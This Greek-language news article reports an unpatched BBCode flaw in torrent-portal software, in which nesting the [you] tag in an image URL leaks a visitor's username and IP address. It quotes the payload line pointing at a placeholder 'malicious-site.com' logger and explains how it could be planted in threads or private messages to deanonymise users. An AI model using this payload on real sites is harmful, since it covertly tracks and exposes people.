Ένας ανώνυμος ερευνητής ασφαλείας κρούει τον κώδωνα του κινδύνου για ένα ελάττωμα ασφαλείας για ένα δημοφιλές torrent portal λογισμικό ιστοσελίδας που μπορεί να αξιοποιηθεί για να εκθέσει λεπτομέρειες σχετικά με τους χρήστες ενός ιστότοπου.
Από την άποψη της πειρατείας και των ειδήσεων σχετικών με torrent, το blog TorrentFreak είναι ένα μέρος που θα θέλετε να ελέγχετε σε καθημερινή βάση. Εκμεταλλευόμενος το τεράστιο κοινό του blog, ένας ερευνητής ασφάλειας που δεν θέλησε να αποκαλύψει το όνομά του, ήρθε σε επαφή με τον ιστοχώρο και αποκάλυψε λεπτομέρειες σχετικά με ένα exploit που είχε ανακαλύψει πρόσφατα .
Το πρόβλημα έγκειται σε ένα πακέτο λογισμικού που χρησιμοποιείται από τους tοrrent διαχειριστές της ιστοσελίδας για να δημιουργήσει τα portal τους. Ο ερευνητής αρνήθηκε να ονομάσει το πακέτο λογισμικού καθώς το ελάττωμα δεν έχει ακόμη επιδιορθωθεί.
Αυτό το λογισμικό έρχεται με υποστήριξη από το BBcode (Bulletin Board Code), ένα σύστημα που αντικαθιστά ορισμένες μορφές κειμένου με κείμενο, εικόνες ή άλλους τύπους δυναμικών πληροφοριών.
Σύμφωνα με τον ερευνητή, υπάρχει ένα ελάττωμα σε ένα από τα ενσωματωμένα BBCodes, στο οποίο υπάρχει το συγκεκριμένο πακέτο λογισμικού. Το BBCode είναι [you], το οποίο, όταν χρησιμοποιείται, εκτυπώνει το όνομα του χρήστη.
Ο ερευνητής ανακάλυψε ότι, εμφωλεύοντας (nesting) το [you] του BBcode μέσα σε μια διεύθυνση URL της εικόνας, θα μπορούσε να καταγράφει τα στοιχεία για τους χρήστες ενός ιστότοπου. Ο τρόπος για να το κάνει κανείς είναι ο εξής: [IMG]http://malicious-site.com/logger/[you].png [/IMG] (όπως φαίνεται και παρακάτω στην εικόνα).
Αυτός ο συνδυασμός δείχνει μια 1x1px διαφανή εικόνα PNG, που φορτώνεται από την κακόβουλη ιστοσελίδα του εισβολέα.
Ο ερευνητής εξήγησε ότι ένας εισβολέας ή μια υπηρεσία επιβολής του νόμου, θα μπορούσε να εγγραφεί στα tοrrent portals, σε ανοιχτά θέματα φόρουμ ή να στείλει ένα προσωπικό μήνυμα στους χρήστες που θέλει να στοχεύσει.
Όταν ο χρήστης αποκτήσει πρόσβαση στο thread ή το προσωπικό μήνυμα, το BBcode εκτελείται αυτόματα, φορτώνει την εικόνα και καταγράφει τη διεύθυνση IP του χρήστη στο διακομιστή του εισβολέα χωρίς ο χρήστης καν να αντιληφθεί ότι υπήρχε μια εικόνα στη σελίδα.
Οι χρήστες που δεν χρησιμοποιούν VPN ή proxies για την πρόσβαση σε ιστοσελίδες tοrrent μπορούν να συνδέονται μέσω αυτής της τεχνικής και αργότερα να εντοπιστούν στα αρχεία καταγραφής, συνδέοντας την πραγματική διεύθυνση IP τους με δραστηριότητες που σχετίζονται με πειρατεία.
Όσο για σήμερα, ο ερευνητής δήλωσε στο TorrentFreak ότι μία από τις πληγείσες περιοχές είναι το SceneAccess, μια ιδιωτική ιστοσελίδα torrent.
